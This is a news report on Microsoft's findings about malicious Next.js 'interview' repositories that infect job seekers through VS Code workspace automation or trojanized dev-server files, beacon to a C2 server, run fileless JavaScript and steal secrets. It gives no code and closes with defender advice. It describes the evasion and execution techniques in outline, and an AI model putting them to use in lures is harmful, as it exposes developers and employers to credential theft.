Microsoft flags malicious interview repos targeting Next.js jobseekers

Microsoft’s threat‑intel team says the malicious “interview” repos are engineered to blend into the normal Next.js development flow, exploiting the very tools developers trust. One variant leverages Visual Studio Code’s workspace automation, automatically loading files the moment a candidate opens the project. The code then pulls a JavaScript loader from Vercel, runs it under Node.js, and immediately begins beaconing to an attacker‑controlled command‑and‑control (C2) server, according to Microsoft’s findings reported by The Register.

Other attack paths trigger when the victim starts the Next.js development server—either by running `npm run dev` or by launching the backend directly. In these cases, trojanized assets or altered library files embed the loader, which executes during server initialization or module import. Regardless of the entry point, the payload registers the infected device, launches a secondary Node interpreter to run in‑memory JavaScript tasks, and opens a persistent outbound channel to the C2 infrastructure. The controller can rotate IP addresses and API identifiers to evade detection, and it retrieves a `messages[]` array of JavaScript commands that are executed without leaving files on disk, allowing the exfiltration of source code, API secrets, personal data, or cloud credentials, Microsoft said.

The C2 server also issues kill‑switch commands, monitors spawned processes for performance anomalies, and reports error telemetry back to the attackers, enabling rapid refinement of the malicious code. By keeping the malicious logic in memory and limiting on‑disk artifacts, the campaign reduces its footprint against traditional anti‑malware scanners. Microsoft warned that developers who run these “interview” assessments on corporate machines could inadvertently open a foothold for broader network compromise, a risk highlighted in the report.

Defenders are being urged to treat developer workstations as a primary attack surface. Microsoft recommends heightened visibility into unexpected Node.js executions, outbound connections from development environments, and any anomalous file‑system or network activity that originates during routine coding tasks. The guidance aligns with broader industry calls to secure the software supply chain, especially as the Next.js ecosystem continues to grow and attract talent through code‑based hiring exercises.